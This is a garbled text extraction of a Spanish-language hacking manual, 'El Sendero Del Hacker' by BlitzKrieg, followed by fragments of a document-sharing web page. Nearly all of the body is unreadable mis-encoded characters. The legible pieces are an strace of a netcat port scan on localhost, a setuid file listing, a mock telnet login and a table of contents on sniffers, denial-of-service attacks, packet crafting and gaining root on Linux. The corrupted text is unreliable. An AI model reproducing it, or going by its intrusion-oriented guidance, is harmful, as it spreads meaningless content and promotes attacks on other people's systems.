32 Worale: Es una interjeccin creada por Marianita Lpez, compaera y amiga. Es la contraccin de las palabras Wow y rale, ambas
sinnimos que denotan admiracin o perplejidad. Aqu lo usamos meramente como ejemplo de una cadena de caracteres.
164
? BR :2;

C"? V 1??V9!9
" 2!
<
4
: : @
A ;!
! "
! "
0
: $5-%"+C?1 1?$%;
& : & & ! "
& &
;!
% ! %

!
$5-%"+C?1
0 ! 4
2 : ;
# 4C, ! 5
0 4C,
&>
; $ & !
; " !
; -.. :4 . .;
; 50 : 2;
" ! 4
!
/ * 0
# 4C,!
C"? /.?
!
6 & /.?>
F F I 9fq F P I5J9RRRq I>VVVc
9RRR 5 I 9J 4C, :#
;! 5 5
# /.?! % 5 *
! % 5 5E : 0;
1??

1??!
165
C"? * >
F >VVVcN9fq F P I5J9RRRPqr=f%cc
% # & *
* 4C,
0 0!
$
! " IJ
! " &
! 5 &
0!
* 0 0 & &
!
$ 2
0 'D%
! " .<% :.<% &;!
# & .<% ! .

.<% :P;
:I; ! /
.<% &! "
.<% & !
1 2 ! "

# ! %
222!! 222!(! 0
& ! ?
: V2
2 ;!
5
&!

#
! 1
0!
% # *
: * # ;! 5 #
* (
* !
* VV2
* ! '
+

!!
. # #
& ! 5
!
166
0
>
^_ VV F R F @LRRR F
>
^_ V l: F FLRRR F VV! Peb e elP l;
V
:LRRR;!
>
-rwsr-xr-x
1 root root
Dec 20 2008 /usr/bin/passwd
24680
# 2 : &
;! " # 0 0 L!
& : ; ]LRRR
! " 0 0
!
! .0 %
0!
' :
5
51;! ?
& ^5+& !
4 ! "
! .
!
%
/2 7 .
6 D 4! ?
! 5
! 4
0 &!

& ! .
1*9

! 1 !

0
%! .
& ! ,
! "
5! %
(
KK ! " 0 : f ;
&! 0
&>
167
^_ =
% # #! ' >
^_ F F ! =
4 5
! 4 5
& !
5 +4
^_ F ! 5
38O4R4R433RR58RR
" +4 :; :F;
:9=S!R!R!9; 9RR =RR!
" >
execve("/usr/bin/nc", ["nc", "-vv", "-z", "127.0.0.1", "100-200"], [/* 33 vars */]) = 0
brk(0)
= 0x804e000
access("/etc/ld.so.nohwcap", F_OK)
= -1 ENOENT (No such file or directory)
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fcb000
open("/etc/ld.so.cache", O_RDONLY)
=3
...
write(2, "Orianna [127.0.0.1] 100 (?)", 27) = 27
write(2, " : Connection refused\n", 22) = 22
write(2, " sent 0, rcvd 0", 15)
= 15
write(2, "\n", 1)
=1
exit_group(0)
=?

0 &! & ,

/>
" ! " &
! "
# & 5?1! 4
5?1
& ! 4 , #
0 * 5?1f!>_5?1
& ! 4 &
VV
! 3 !
0 57 (8 5
8 5 * 8 F
& !
/ #
& ! . &
! 5 #
!
168
4 .
' . ! 4 .
'+,- .
0 ( ! 1
. & 2!
.
! + '+,-
! " ! "
# ,.
! "
!
" #
'+,-! ' . /
& ,!
4 . '+,-
'+,-! 4 . &
:2(;
.
' % !
5 ' 3/. : $.F3/.;
!
3/. ' ! .
* '+,-! .
% ( # ' .!
" , . '+,-
! " #
! 4 0 '+,-
!
@ D
% 0 .
! 5 #
,. .
!
4
'+,-! "
# 0! " !
/ E0
? ,. # ! 4
.! 5
!
4 ,. *
! . ,.
, # .!
169
" .
, %
T!
2 ! "
,. ! %
: ;
# !
?

.!
% 0 #
&
!
. 0 , K7 .K : ;
*
! .
! .
&
. '+,-! 3
& & :D 4;! + #
!
0+0
. 0
0 '+,- .
! " '
% . !
. . ,.
& !
. ! %
.! 1
?
)2 # ?! 4 &
! 5# 1
0 ! &
]!! # ! 1! " & KK
K6?9RRK! % K4K ! .
0 ! . .
& ! .
>
Welcome to ATT
ATT.com.mx.
Login:
Password:
Linux 2.0.0
Last login: Thu Nov 10 19:02:00 on
ttyp5 from zn30.lovvu.net
Gerry:~$
170
. ! %
! .
.! . PbP .
' 0! " # b &
!
. : ;
! , .

. !
1

' K K 0
0! + C C"DD./+!
. 0
. ,. !
. 0
,. 0
!
5 *
2 ? .
. *
2!
3 .
2 . ,.
: ; ,. .!
' . :. .;
:
?4V, 6+;

6+ !
0+
" . ! 5
!

E04% ,.! &
& ,. #! "
& #
! .
!
&4%
! + .
( *!
07 4/ #
! D +4 ?
! .

,. K1 .K!
171
5 &
! + #
& ! %
KK KK
!
& 7G& +4'
.
:. 5 ? 7 5 +2(;
:
; !
/ .5?5+

0 :;!
M (
N 3 .5?5+! 3
+4! % #
( ! .
0 #
!
50 # .
! "
(! . !
( ,. (
& !
' ( !
& # .5?5+ 5+C"%!
& ! .
0 !
'& 0+
' ! 1
* &!

^_ _.1"%%
B&
& 0+
22+

22+

5 :;
22*+

22 +
4
. K _.1"%%K _ 0!
172
M N !
&
_,_,_, ! & (
4 ! 5
# ! .
!
% !
KK # ! .
,. ! '

%
. 4 +2
D!
.
> KK 48 K(K KK
KK
? K K [! . K !K
5 ! 3
,.! '+,-
! 6 # '+,- %!
% 3 0 $
^_ GH
" !
^_
% ! 4 5! !
. 5!W!
^_ 2
$ !
^_ GH
6 ! 5 V V V!
^_ G H
$ ! ? KK KK !
^_ 2 G H
" ! " KK KK!
^_
' !
^_
"
! 4 KK KK K(!K
^_ G H
4 !
G H
! . # KK
KK !
173
, +4
# % ) '
(
. 6! 1 +& $ .
# ! +4 ,
! " 0 ! "
# ! +4 ! "
& !
" +4
4! "
( #
* ! . * #
! 7 )AO
)AB )- +? ) %R! % ) +4 9!R!
. & 1
0 9AAO 9AAQ 9!9R
! 5 9E * (

! +4
! " & ! +4
/.,-
C+' +4 C C 2!
5 +4
! 8 M<
N M< # N " (
!
+4 ! "
# # & ! %
*
!
" #
( ( !
0 & +4! "
!
)& +4 !
& ')!
. &
! "
! 1 !
' & +4 p
#!
+4 ?4
'3! " * K K
.1 :
'; : F;!
174
5 #
#
! +4 #
# '!
+4 ! 5# (
! 5
+4 & !
" +4 ?4 ! %
#
! " 0
! " #

!
+4
! 4 +4
KK KK F #
! "
!
# '3 # +4
K'3 K * $F'3!
-(&
?

! Z +4
!
?
! ?
& +4

!
'3 ! +4
* &!
% +4 ?4V, )2
# '+,-! ?& # $.F3/. :
. %; 0 ?4V,!
" +4 ?4V'3

! + ?4 '3
7? .$? 1??!
1
+4 % :. & 4
& ; )+? : ;! " : 343>
) AOVAB )AB." )-
!
175
, 6

F4 '3 ?4 !
F6 3+.
F'
F'
F1
F4 KK
' *!
F !
F4 # +
F$
F4 & &
F/ #
F4 +4!

+4 ! 1
#
& !
' #
0 ! ' 6
MN '
+4 !
+ # ! +4
! .
!
% +4
! 5 #
#
+4 ! $ #
!
1
* +4 K( K! "
! . +4

!
3
+4! ?
# & #
!
DJ
" & : %; K K
'! % # +4
`& X+&
+ , &
! 5#! ?4
!
176
% +4 # : ; 8
+4 # : ;!
+4
!
+4 ! "
& ! . +4
! .
! "
!
" # '3 # +4
'3! 4
'3 ?4
& 0 !
" +4 & ! ?

! "
! Z +4
! ?

! ? & &
8 +4 & & & !
+ ! ?
'3 ?4! +4
* &!
) '
" +4 !
? # &

. "!
$ . . "
& , ! "

!
+4
&
!
6 , +4 KK &
#
+4
VV!
, 1E #
+4!
177
.

V 5+

2>
>
>
F
F
F
FC
F
F
F
F%
F
F
F
F
F
F
F
F
F2
F
`5&X+&`X`&X !!!

55&&`&X`+X`&X

`YYa
2 F à B
F > L B 9= !!!

F (
F , 3+.

2 ?"%+"?
'3
` 2 a

F,V/ ` a
> F à

:$ . ; 4 &
!
U&V
:"& ; & . !

:" 0 F" %; 3& !

: 0 ; "
) 0 5 :
;!

:3 8 01. ; +4 #
3+. %(
,!
U7V
: 1 ; C % +4 1!
&U&V
: ; 5 !
U& V
: , ; +4 , !

:7 * ; 4 +4 !
178
& 7 D

:' '3; 4 +4 & '3 ?4!

: * 5
#;
0
.!
GU V
:" ; 4
!

:C D :; ; $ 0
.!
UG)V
:" C2 F; ' +4
KK !
JU9V
:" D; 4
:.;!
U V
" .!
`

343RX
#$ 5+
/>
F qFP8 VV `YYa
F
`YYa
F
2
F 2
F à B
FC
F > L B 9= !!!
F

F

F(
( (
F

F
F , 3+.
F

F

F

F
"/7
F

F
2 ?"%+"?
F
'3
F
` 2 a
F2

F
? / .
F
F,V/ ` a
> F à8
( :!! PlFP;!

% )2 % &
5 )2!
179
" % +4
& & 48
# %
. .!
$ % D 1 7
' +4! %
! .
#! "
% >
!>VV(V99R!
!!>VV!VV(V99R!
!!>VVVVV!VV99R!
& '
% ! " <*7 ..?"
& K( GHK! " KK & #
! . ..?" :KK;! .
! $(
1 !
1 b 4 37%5C. f
KF 3 F 3K * $(! 6
!
. # ./. :;
,+3 L!A! -%,

.fF $( -%,
. f KFF
LLK!
% ! 73c."?.,["8
!
5 : ; ! +
!
E ') & '
E&

' &
& )
/4
& ) 7& && & 5)5=
)J&0 ),>4
% & & ! :; +4
! % & !
+ +4 <*
7>
( 37%5C.fK F3?"%+"? F3C5,+Cc."4'D,?c1/%"K
4 : ; 22 +4
.
: ; ! " 7 &
!
180
" +4
& ! %
+4 2 & >42& :
;!
/ ! 33R4/
.' >
( + rr
F4 F 99R! rr
rr
! !^ rr
F PVc:;8VlVl\ c:;8 l\lVVP G!^ H! rr
$( $(^ rr
F PV47%5C. fVb 47%5C. fVP F PVl_:.?5?,4;VVP G$(^ H$( rr
( rr
VV
" *
# bE9= !! %
47%5C. : F/ #;
& ! +
+4! ' #

^_
3
5 54
D
& & & &
& #
!
5 +4 >
/ . 5 :%; &
5 :&;! 4
+4 &
!
F F =E !!! =E F F !
" & +4 8K=>
& . :!; ! % 5
+4 & !
181
. +?
+4 # !
% +4 - ! . & +4
+"?
,/. #
+?
K7 K ?4V, +2( 4 +?

&
+"?
,/.!
4 +4
)2>
>lH F G,H GH
:. * 5
;
' & OQ =!>
0 K
F7
5(K +4
>
>lH F GH SA G ! H !
" +4 1
SA :7; !
!! :+ ;!
. +4 !
" 0
&!
" , ! . 5
+4 , 3+. !
. 5 5
+4
, ! "
0! 5
, ! . 5
+4
!
"
!
" 5G +4
! & 5G K +4 E
: ;!
3 0
! 3 +4 &

& !
182
' 5 +4 '3 ?4! 5
'3 +4 & F
'3 ( !
5 +4 '3 :
;
# ! . '3
! 0 #
! . 4 '3
+4 & !
5
! " 5 +
Z Z !
" KVK KUK #! KHK
KGK ! 4 #
! "
#
!
+4
! " 5&
9Z&! " G9R=L!
. 8
5 5& #
: ;!
? ,
: ; ! "
!
" +4 !
5
! " '3 ?4
& 5

:4 #
;
, ! 3
+4
! 3 5
+4
!
. +4 5JEJZ0 DBETZ, 5
& ! "
! 7 ?4 '3! " F
!
!
! 4 &
!
. +4 5 5
K >K ! 4
# !
183
4

D"3"7,+". $( >
37%5C.f F3C5,+Cc."4'D,?c1/%" F3?"%+"?
1
B! 3 #
5
! " B # #!
.
# #! " 5 +4
& !
" : V; ! "
!
! "&>
D =R 99R>
F F2 E F =9F99R
F F2 E F FE
Z 0 & #
F! +4 KFFK8
K=RF9EAK!
" 5/ +4
?4 '3! 5 #
5 !
% 5/ ! " ! " +4

!
" 5 +4
! # ! 5
5& ! + 5
KK !
0 !
" 5
:F;! . B !
"&>
F F2 E F 29! F 2=! &!! =E
" 5J :0; &
! % L :L B
9=!!!;!
1 KK !
0 ! 5 % F
!
184
+4 '! %
] ! 3 5.4,,
KK 0 0 ! &>
i F F2 E ! 9=ELO
F F2 E ! 9=ELO G
D& ;7
" & ! .
! $& +4 .1 : . ;
&!
+4 0
(
!
...
F 222! F! BR

C"? VV!
...
; &a &2Ga
2 222! F!
" BR! ' G"+?"DH V!!
! "&>
VV!
4 : ;>
K!!K
K.56"K
K1/.?K
K/D?K
+> " 1?$%! " +4
1?$% !

&= H7& H 4>
1 # &>
F 9!! =O
5 4@4
!
185
B &

i F F2 E 9!! =RF=OR ORRFQRR LRRR QQQSFSRRR H ! =Hr9
" KK +4 #

! " & 3Q = +> ! ?
!! , & :=Hr9;! 1
( !
B &&

F F2 = F 9!! =RF=OR ORRFQRR LRR QQQSFSRRR H ! =Hr9
+ ! +
! !
'2B & '
3 >

F F E9EES i F i F
5
V i F i F2 E ! E9EES
5>

F F 9=ELO i F H !
5
F ! i F2 E ! 9=ELO
+> /
!
B & '
;G

F F =RREL G--4 2 : !;
>VV 9!!>=RREL

" 2 ! .
+4
5.4,,!
186
B&/&

( 0
! . 3C5,+Cc."4'D,?c1/%"
+4 5!
E

+4 !
B&/&
*
. :, D 4;
:3448 3 4 ? 4;! % & ?4
5 '3 !
4 ?4
] !
' !
F F 9=ELO
/
F2 E !! 9=ELO
B ' 67 GGGH 7G
4
,
VV!
222 2 VV VV F2 E 222!! BR
0 6-
.
( ! " & ?4 '3 #!
5
9=ELOQSBAR9=ELOQSBAR i F F F QAQA H VV

RABSQOLE=9RABSQOLE=9 i 9!! H VV
" V!
!
&
5
5! "
!
0 '

. :;
2
4 + ! 3
4+!
187
2 i F F2 = F 9R=E 9!! =E

17 7 =)>
. 2 2)4 7 & #
!
PGRHc&P i F F2 = O9L
D O9L !
+- - 5
6 KK :F;
?4 '3
!
@- && 7
% -22 !
+4 QRRR -
!
6 >
bYVV
b " -
b =
b ! 7 !
2 8
F F F 9=S!R!R!9 F QRRR =

" +4
" & &
! "# !
&
" 4C, 2 +4

# 4C, !
7
5 # )2
( ! 4

3. !

" & =R #
! & +7.
! "
!
" ' & :G 9R=L;! " )
!
188
&

" #
# ! ?
5!
>
9!' ..1 : ;
=!' C
5)5
' +4 5 5 0 :' F;! .
'3 & ,!
" # #
?4!
.
F F F VV F EEEE
+
F F2 E !! EEEE
/ ' 4
! % ?4% :
2; & ! "
+? 4! " )2 4
)A-!
-&@!
. 2
! " &
: ; O9= :;
# +4!
2 2 i F F2 E 9!!
" 2
!
"
:; # O9= KK! "
!
" # :; &M3K
O9= 9R=E !
5 & 33R =&&K> K
(K!
" (
( :
7;!
&
: ;!
189
0&7
" . KK
! .
5 5J
0T!
" .+ 5
O 0! 4
:.+;
:.+V54; :54; .+
54
!
" .+ KEF2 (K ! "
! "

!
4 ! %
.+cD"46! +4
0 (
54 : E O ;
D.? !
+. G
. &
! F ULLOO U !
# )2 +? )2
=RRR ? LLOO
3/. ! 4
! + )2 +? )2
=RRR & +4! .
)AOFABFAB". )- !
6 +4 &
3/.
+4 &! " ^
!
! U U LLOO U U !
3 +4! .
? LLOO +4
& & ! ^
+4 !
! U LLOO U U% U !
"
!
4 !
190
0& 'E

. , ! %
,! "
, ,
, #
! ,
, ! % # ,
!
+4 ^ , !
4 # ^
$ 7
,! .
, !
. &
$ & , $! +
, ! M4
, N "
0
! "
!
" >

"
" &
"
! 5

&! " &

! '
, &
! % #
!
% ^ +4 B
&>
U 9R!9R!L!O U 9R!9R!O!B U 9R!9R!S!L U 9R!9R!A!A 9R!9R!A!OR =E
9R!9R!A!OR

L ! .
U 9R!9R!L!O U 9R!9R!O!B U 9R!9R!S!L U 9R!9R!A!A UC 9= 9R!9R!A!OR =E
^J! % ^J
: ; ,
L 9R!9R!S!L!
9R!9R!A!OR 0 :
;! . &
L !
191
@ * =>

`' ? "a
%>
F F 9RRRR F VV
" % +4 5 +4
5>
bYVV
f_j>F_9k
F F _ F _R r b "
` _9 aii D/CD5$
? )2>
F% F 9RRRR F !
0 6
7=. G>
. 4
`. ? ,a
?
4 ! "
D74 9A9B! " 4 $'
1??! " +4 0 ! 5
&
!
" 1??
=9 V =E! "
# &
!
4>
F F F BR
.>
cc BR F VV
% # . +4 , 4! '
4! " . &
VV!
& ' &= >
4 +4 #
! . 0

2 ,
. ! % ^/ ! Z +4 #
0
! " ^
^

U !
192
. 9=S!R!R!9 9RR 9LO
999 9EA!
^_ F F 9=S!R!R!9 9RRF9LO
/ `9=S!R!R!9a 9EA :F;
/ `9=S!R!R!9a 999 :;
^_ F F 9=S!R!R!9 9EAF9LO
/ `9=S!R!R!9a 9LO :N; > 4
/ `9=S!R!R!9a 9LL :N; > 4
/ `9=S!R!R!9a 9LE :=; > 4
/ `9=S!R!R!9a 9LR :N; > 4
/ `9=S!R!R!9a 9EA :F;
!!!
/ `9=S!R!R!9a 999 :;
R R
% F F!

,
# ! +4
! .
^ ^ & !
" >
^_ F O F F F 9=S!R!R!9 9RRF9LO
/ `9=S!R!R!9a 9EA :F;
/ `9=S!R!R!9a 999 :;
" +4 , 9=S!R!R!9 9RR
9LO O ! +4
9EA 999!
'3 ^ # !
6 5
:; / 5/ : V;
, 8
!
077
/ +4
!
" & )2
F F F% 9=S!R!R!9 F =E
3+. 2V > Yf ( à =E !!!
3+. 2V > Yf (
`9=S!R!R!9a `9=S!R!R!9a 99E9
>
2> !
. !!! ?
+4 &>
193
F F F% F =E 9=S!R!R!9 F H!
à =E !!!
`5 !!!a
3+. 2V > Yf (
`9=S!R!R!9a `9=S!R!R!9a
9RER
`? !a
R L=
3+. 2V > Yf (
`9=S!R!R!9a =E !!!
" "F"> F F F% 9=S!R!R!9 F =E
"& +4 5
:; +4
: 3!c-; 5
:% ; & KK
: ; 5& !!!
5 & +4 5
1
>
3+. 2V > Yf (
à =E !!!
D :9=S!R!R!9; =E! +4
=E>
3+. 2V > Yf (
`9=S!R!R!9a `9=S!R!R!9a
99E9
>
0& +
% & +4
KK +

(/
! , 7
!
" &
( / :
/; X Y Z &
,D48 # &>
F F F F% F E9EES 9=S!R!R!9 E9EES
3+. 2V > Yf (
à E9EES !!!
`R!R!R!Ra
9FRQL!!!!
`9Q9!9AQ!=LQ!QOa
E9EEB
194

( / '3 ! D
: 9RBR; E9EEB :
/; 5 : '3;! +4 '3
E9EES :
/; 2 , +4
, 3+. ! % * K 3K :+(;
. !
9FRQL!!!! `9Q9!9AQ!=LQ!QOa LB
:N;>
9FRQL!!!! `9Q9!9AQ!=LQ!QOa LS
:N;>
9FRQL!!!! `9Q9!9AQ!=LQ!QOa LQ
:N;>
9FRQL!!!! `9Q9!9AQ!=LQ!QOa LO
:N;> ?,$"3/'?
9FRQL!!!! `9Q9!9AQ!=LQ!QOa LL
:N;> ?,$"3/'?GFF1
< 6

. # 2 +4! &
7?
,3 2 #>
$ , 7? . 6!O!A `
a RLV9QVAA !
' 2 K"K
%/>
% #>
F F F% F =9 F G !
$ !!! 5# 2 *
+4!
1/
. +4
?! % & ? +4
KK KK ? : #
+4;! +4

? &

( '!
+> 5
# 28 +4 #
! +4
>
F cc =E : ;
& &
$ :9A=!9QB!R!9;>
F F OQRQ G (!
195
" OQRQ (!

!
$ 5 :9A=!9QB!R!=;>
. 9A=!9QB!R!9
D (! !
E
$ 4 :9A=!9QB!R!9;
9A=!9QB!R!= OQRQ
. 9A=!9QB!R!= OQRQ
$ . :9A=!9QB!R!=;
U U OQRQ U !
" OQRQ! " ! &
OQRQ!

' ! 4
&! #
& >
F F VV F QRRR
5# +4! 5 ! 5 . &
! 22+ " %! " 22 # !! 5&

3 # QRRR
VV %! . # ./ )2
# !! ' #
! , '"D?/>
F G,H G'"D?/H
3>
5
. : ;! UEV 5# , #! UDBV 5#
!
" & >
F 9A=!9QB!9!EL QRRR
%!
+/?5> " & K>lK # ./ %
)2 #! / 2
!
196
7 +

$ 4 :9A=!9QB!R!9;
9A=!9QB!R!= OQRS G (! 4F4
. 9A=!9QB!R!= OQRS 4F4 !
$ . :9A=!9QB!R!=;
F F OQRS H (!
" OQRS! . V33V

$ 4 :9A=!9QB!R!9;>
4
9! F 9A=!9QB!R!= =9
4 =9
=! F 9A=!9QB!R!= SA
, SA :;
E! F 9A=!9QB!R!= =E
/ ? : # +4;

# #
! 6 &> "
>
F F F QRRR
QRRR! " # :%; >
F VV 9A=!9QB!9!EE QRRR
% # ! " & &
# , 3 : , ;
# ,
! #
+/F, & !
& +
&=. G>
%
& ! 3
)2 !
! :LS
;
! :OB
;
197
+
& &3
]
! eelE=
eelE=l! F% F F ! F 9RRR
D"C 533 1"c%/45%c$541,+"l./7?)5D"ll22l46lDl V D V D"Cc.[ V
Ie2elE=l! F% F F ! F 9RRRJ

+
& &8
]
! eelE=
eelE=l! 9A=!9QB!R!9 9RBR i ! i ! 9A=!9QB!R!9 BBBB
D"C 533 1"c%/45%c$541,+"l./7?)5D"ll22l46lDl V D V D"Cc.[ V
Ie2elE=l! 9A=!9QB!R!9 9RBR i ! i ! 9A=!9QB!R!9 BBBBJ

M3 +4 # 4N ! +
# 4! 5# & 22 : %
` +4a; >
b G2(=!H
b G!H
b G22!H
b :K2=cE=K;
: \à;
j
.2)2:C7)2:;.)c1,3";8
).535?5 238
./4"? .(8
.?5D?',+7/ 8
D/4"..c,+7/D$5?,/+ 8
(c 8
:rR :;;8
:rR :;;8
).5.:$5")/D3:=R;r23;8
.( f
).5.(:57c,+"?./4c.?D"5$+'%%+'%%+'%%+'%%;8
!c f 57c,+"?8
!c f :'"D?/;8 VV5 # # +4
!c!c f c:K5# ?' , / 3/$,+,/ +/F,K;8 VV5 # ,
:.(:
(\;r :;;8
! f :;8
!27 f .?5D?7c'.".?315+3%".8
!., f !./ f
!." f : \;.(8
4:+'%%KK+'%%+'%%+'%%+'%%+'%%rr;8
":R;8
k
" 4@@ ! 1 0
"-" 34@@ ! "
& # &
! ?
5? : ;
! 1 # & >
>VV!2!V2V=(OV9LR9OB9!
198
% 1 6
5 ( !
9!
=!
E!
L!
, &!

' :. ';!
!

!
35E

%
?4V, +7. +,. KK
'!
% ?4V, ? 7? ?7? .$? 1?? !
4 &
! "
?4V, # !
0

+7. f +2( 7 .
"
! '

! /
: ;
+7.!
" +7. !
+,. f +2( , .
" KK! %
2 ! &
2! %
!
" - :# 2
# 2 ; +,.
!
[[
. ./ '! % KK ! "
+4-
:
; 4+! 3

2 +!
5
, . ) T # ''4 !
199
" >

9 F " &! &
KK 0 : 2 &
! 0 +7. !!!
;!
= F 4 2 & (! " 2
2 : ;!
2 ( :
4( $.F3/. T(4( 1 4(
4( ;
2

2 !
85 &

/
" ./ '
# &
!
+> 3
?4V, ./! $
./ ' ./ 6$. 6$
! " ?4V,
: ;!
' >
&
4 "
' : F !!!;
! " ,
*
! "
: #; 4"D?
'C?D5<
. !! !=QRR
!" #
* !
<&
4 "

!
< :FF; KK!
4 : VV;
0 : & ;
! + 2
: ; : ;
LSOO!
L & &
2! 4 2
!
3
&
!
200
%
: &; !

!
K5@+
"
#
& !
" ./ ' :; ! "

! 5

!
+

:4
;!
& C :;
!
3> VVV VV
G& C !
3> VVV2 VV2
C 0 !
3> VVV
D & :
&;!
3> VVV
" & !

G+ & !
7% 2 * ! "

& !

, 2!
, ./ '!
% 2
!

+ 0 ! "
2!
201
& & &!
"
2
& &
! "
!
5
!
& !
, ' ..?"$ 6!
%
: !;
2 ! "
>
+
&)G&
9 F + & ! . 0
! 1 (
!
= F % 2
! . :
/&;
& !
+

4 :
& ;
# #
!
9 F %

& !
> + # !
= F 3& ! 4

# !
>
! " # &
!
E F 1
& ! "
!
> % & #
& !
5
& !
202
5 2
./ ' #
!
0)
. ./ '! " ./ '
&
&! " &

!
>

5 F 3 &! : ;
(> & (!
> & & !
> & !
> & !
> & :
2 & ;!
> & !
F 3 &
!
> !
> !
> #!
> !
2> !
>
!
> & !
4 F 3 &
& ! . :
;!
" VV!! 3
! %
:;
& !
' +
)

&
2 2)4 7
5 2
# !
!

VV! !
3 0 &
: & K> %/C,+ D"7'."3 K
;!
203
"
0 & : ;
! . # 0
:
;! . #
# !
. VV! & VV
& : ; :
;! " : ; &
&
! "

!
5.&&
. :;
:; : ;! 4
!
&

# : ;! 5
&
: !!!;
4 F2
:& V;
!
# ! +
#
: ; :
;!
# &
&
+ & :
4 $.F3/. ;
& !
" , ! 4
& &
& :
!!;
& !

#
!
" 2
2 # :2;
VV
#!
204
' # # 2
: ; 2
: 2
;! 3 0 &
!
0 &
& !

! 6 0
4 ( :
0
;!
' # &

F2
& :;!
L577&
(
! % !
# !
? KK
# ! !!
1
! <
!
205
4& 7
9 F"
! "
!
" 0 ! .
& &
!

:
./ ' ;
& 0 !
" :
( ; (
!
5 0 (
:
& ; 0
7? & : ;!
= F" 0 !
,> " & !
% &
# :
2 ;!
+
0 & !
% # ' :
; ?4V,! .
: ;
: &
! F
!!!; # :
;>
, F / = # (
./ '
( 75<
!!!
,, F 1(
! " K K KK
! . ./. L!9! ! "

( :
;
!
206
E F 4 (
! . (
(
&!
, F % (
& (!
,, F 4 (
(
! & !
&
( !!!
&
!
L F + ! +
!
. &! .
& / :
; !
'
&! %
! " >
#
!
O F $ 0
# ! 3
(! 4
!
4 (
( &
!
!!! !
207
$ 1(
" & " $! 5
*
,
! ' # 1(!
1 ! IT J I(
J!
I$ J
M # *
& (N M.
# N ( ! $
! . * * !
I$ ! . J! ! % #
! ? ! I+ .! . &
! % J!
I$ ! . ! . J!
1 ! ' ! " ! 1 ! .
! +
* #!
$ ! 5 &! . ! " !!!
!!! # #
#!!!
!
I" !!! # !!!J! 4 !!! &
!!! !!! !
!
. !!! !!!
!!! & ! /
! 5 *
& &!
" !!! ! '
# !
!
!!! !
+ !!!
! 4 #
0 # !
.# ! $ ! $ &
! $ ! .
( ! !!!
!
23 BC6B%6%DCE
208
' (

! 1 #
)( * .
! % *# D
+ 9ABQ
3 +! 5 *# ?(
!
. ( 9AAA $
! . 2
# 33. 0
2( +4 + :
%; ! 4 &
!
5 # (
! % # &
)- %
5(!
=B & >
" * &

! 4

, ! "
& 0 !
4

&
! " # ! $

#!
5# * &
& & ! ? &
!
&
% >
$ I$J % " I" .J . 5 4 0
$ I$J %
!
" // =!=!R :222!!;
37! 1 . / 7 =!R % :>VV222!!V2;!
Atentamente
BlitzKrieg
Agosto 2007 Enero 2009
209
)

9! 1( . , 1( 8 ]!
2. 4 6 ' 1(8 " . D `>VV222!!V^VV(F
2!a

E! K% 3 #K8 3 D( .! D

L! .P "8 5
O! . ? 58 5( 7
Q! $ 5D8 7 +! ! =RRO
S! 28 5( 7
B! 2 ( 2 %R4( E!R8 (

A! . 3 ,8 . .8 D ]!
9R! 7?8 % ) 3 7
99! ? 5 "! ? 8 ,
6 D ]!
9=! C , 8 D 7 4
9E! ? / C ? 1( 5 (8 5 5 7 / 3(!
9L! 1(> )P % 5 )P +8 - .% -! 9ABS
9O! 5 58 $ 3
9Q! ? ? 8 + 6 8 D ]!
9S! , 8 % 3
9B! ? 2 8 4 D! D =RR9
9A! P 75<8 6 4 !
=R! +2( , 3> . +
=9! " 8 ,
6!
==! ( 5 ? 98 3 (
=E! 3 .> 3. 33. 3D3.8 ,
6!
=L! ?> 1=
8 4 C!
=O! % 4 .8 + 6 !
=Q! D 4> 52 .! ?! 9AAS
=S! ? $ 1(P 3( D 6 9!=8 ? DA ?
=B! 8 +4! . '
=A! $(R8 1( ) 4 F6 9!=
ER! 8 +4> 4 .
18 +4 1 7

E=! 8 . , ' 5!
EE! $ '+,- D =!L8 T + ? T 4 / ! 9AAO
210

El Sendero Del Hacker - BlitzKrieg

Hochgeladen von

Dokumentinformationen

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

El Sendero Del Hacker - BlitzKrieg

Hochgeladen von

Copyright:

Verfügbare Formate

El Sendero

Primera Parte: Preliminares

Sesin Cliente-Servidor Mediante TCP

Sistemas de Deteccin de Intrusos

Introduccin a Los Sniffers

Manipulacin de Paquetes con Hping2

Ataques de Denegacin de Servicio

Los Servidores Socks

Conseguir el root en Linux

Reglas De Supervivencia Del Hacker

Segunda Parte: Aprendiendo el Oficio

Metodologa del Hacker

Lo Ms Bsico Sobre Redes

Filosofa Cliente y Servidor

Protocolos De Red (Introduccin)

TCP (Protocolo de Control de Transmisin)

El Protocolo de los Pings: ICMP

6 Hackeo: lo que es legal y lo que no lo es. 1987

Para seguir el camino:

" .  1(

D 3 .   3 1(

'  . '+,-  % 

%      >

  DEF

 @    F       *           !

&- ) &  

       =   #>

$ #  1(

4               

L45E  7 '  0

O45 &  '  B =B >

% , # . 

%      #              

7 # 4    . 

"   +

&!; =+) >

&  & = & >

&   ' =   >

   " 

+ & 0G +=  >

7    % 3 

, :   ,  ;

6           ,>

      ,     2     9Q!

?4 :   4   ?  ;

&  &- 

' # ?4V,

"     > ,4$

Solicita eco al host hasta ser interrumpido.

4    5            !

"   '3

Puerto (123, escucha, programa)

Puerto (19344, habla, host:123)

"    %      !

# binkp fidonet protocol

# SSH Remote Login Protocol

.  3+.

.  4  F.  $   ?4

C:\ Ipconfig /all

Muestra (todos) los hosts en un estilo alternativo (BSD)

PC-B Segunda vctima

%    5 #          :3 C 2;     

,       

" . 1(

D 3 . 3 1(

' . '+,- %

% >

DEF

@ F * !

&- ) &

= #>

$# 1(

4

L45E 7 ' 0

O45 & ' B=B >

% ,# .

% #

7# 4 .

" +

&!; =+) >

& &=&>

& '=>

"

+&0G += >

7 % 3

, : ,;

6 ,>

, 2 9Q!

?4 : 4 ?;

& &-

'# ?4V,

" > ,4$

4 5 !

" '3

" % !

. 3+.

. 4F. $ ?4

% 5 # :3 C2;

,

% :; ! 5

. 3 ,

, % .

% >

#

- <55+5<

, 0777;

. #

, :; # 0T

J :D74 SAE QL;! 6 L!

' 0T2 ? .+ !

Q!

" E 0 ! 4

500T)& 7

% 0 # #>

! GF

! GF

! GF

4 ?4

; *

, 6

.

`5&X+&`X`&X !!!

> F `a

& 7 D

`

,+3 L!A! -%,

4

B &

B&/&

2 i F F2 = F 9R=E 9!! =E

&

0& 'E

@ * =>

< 6

" OQRQ (!

, &!

!

35E

" >

2!a